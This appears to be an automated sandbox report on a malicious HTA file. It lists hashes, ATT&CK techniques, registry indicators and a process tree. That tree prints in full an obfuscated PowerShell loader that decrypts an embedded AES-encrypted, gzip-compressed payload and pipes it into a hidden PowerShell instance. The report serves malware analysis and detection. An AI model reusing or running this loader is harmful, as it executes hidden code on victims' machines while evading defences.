b48b6b38768b5e6003b7c9412f3aeeb0bf74126f01e356691b7508c13a1b7e68

General

Target

b (1).hta
Size

67KB
MD5

efdae93cb31dc54c3d87779cd4492a66
SHA1

28e7c6c449170c4f64b660dfa83049e34cea5c06
SHA256

b48b6b38768b5e6003b7c9412f3aeeb0bf74126f01e356691b7508c13a1b7e68
SHA512

8192f1eb0b3147fb6f01b369c9d67904c0a19168a512d8f6414822cdaa2da01ec322d7c8e3a105e897fb33c0150e195f1e2584c31ce84aa7a367d50454f9c091
SSDEEP

1536:KSe9JyrL3EZo/3mgZgqS2P/kPERYSGZ9hJbqbo+UKfy5R9q4sIhuS7:s9JMLTy5jq0h97

Score

6^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1800	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1800	powershell.exe
2500	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 1800	2340	mshta.exe	30
PID 2340 wrote to memory of 1800	2340	mshta.exe	30
PID 2340 wrote to memory of 1800	2340	mshta.exe	30
PID 2340 wrote to memory of 1800	2340	mshta.exe	30
PID 1800 wrote to memory of 2500	1800	powershell.exe	32
PID 1800 wrote to memory of 2500	1800	powershell.exe	32
PID 1800 wrote to memory of 2500	1800	powershell.exe	32
PID 1800 wrote to memory of 2500	1800	powershell.exe	32

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b (1).hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $qehKI = 'AAAAAAAAAAAAAAAAAAAAAKpb10JU5zqcFcVdH2geSO5Vp9uj/iqeY+0Qki/qmQT54wZbmcYZYVZOaEmW6jJnmrbPSh2F+WQCVgF51b1qJnbr4jXWbTueNjXiH2RHc2vUi73dzWKvn2mPC2cJ0WzhHHP/yYPeVKvSwKvPd44du2l+tiUac3MwJe/dcb4EHQ8PCtyYvNnL2/j/PCx9dDeUKNorCC1HPpUgA3ciLHn7RThEyJoG3xdM/zHvQcbu0/Fpi50GSpyll+wJCHspPe2vMpjbswOsgIWbv/ofkDPwccTAycpWCC0+kFjxMvhUrgWNNM98SPSgaUQ/JA7tm5bh7kZLdwgjc4Zc1DwOfWdzHuO8NrslSnbplJa6c3RfvVp6D/JPNCfTffzySoN2KcksVKJ4rpcgZJjYk8t/+Xi7o4hCUuYldmRgYdGgxaxGCiyf+2yG4gEBvJLkWQoqn1nsgCsh6kklCkWucmt8hmJtlAsMOXWEQjAagBi3bS7SDp3fAtLQ2QcHoBhFRA56EHVmWrvKJH+KIcOSwOLF/F2bMnLz7Vut2Ap7AXSqdp9OiEBUMlQAYlfvhS0EnsDltjV9exyhBXrJ1gnPmcXLcESKg28sZZ06kvcwEtbowP/y4BO7lPCqjbVF+rl/mjFdzO2ppg==';$HCHPRCW = 'T1JjU3RWVG5NalFZbk14Z2dEaUVRc2NaQWVSUlNRV1I=';$HPEewZLk = New-Object 'System.Security.Cryptography.AesManaged';$HPEewZLk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HPEewZLk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HPEewZLk.BlockSize = 128;$HPEewZLk.KeySize = 256;$HPEewZLk.Key = [System.Convert]::FromBase64String($HCHPRCW);$QdOvC = [System.Convert]::FromBase64String($qehKI);$PXXSjDtl = $QdOvC[0..15];$HPEewZLk.IV = $PXXSjDtl;$hvADggCjF = $HPEewZLk.CreateDecryptor();$WHUJrcPzX = $hvADggCjF.TransformFinalBlock($QdOvC, 16, $QdOvC.Length - 16);$HPEewZLk.Dispose();$SHPaFOQZ = New-Object System.IO.MemoryStream( , $WHUJrcPzX );$URyqaN = New-Object System.IO.MemoryStream;$lKJOTEDLn = New-Object System.IO.Compression.GzipStream $SHPaFOQZ, ([IO.Compression.CompressionMode]::Decompress);$lKJOTEDLn.CopyTo( $URyqaN );$lKJOTEDLn.Close();$SHPaFOQZ.Close();[byte[]] $VYaSrbX = $URyqaN.ToArray();$uISMRic = [System.Text.Encoding]::UTF8.GetString($VYaSrbX);$uISMRic | powershell -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
f6468acced877b4d26fac7eb3fda0698

SHA1
bb4a5bb3e1f68565480ebc163f8587d483eba4f4

SHA256
626047a983529764869d78656d3dd874151d44bde3e6edf2f020be828df142b0

SHA512
01e3684e049c93e5fb7874d8893fae35ad2f497962c1030c71f134dabc7ae3f7be746c673b0eba1f44ceff5218ec603489b538237b30de59ec9ef3ba0f026bd1

Download Submit

Analysis

Sharing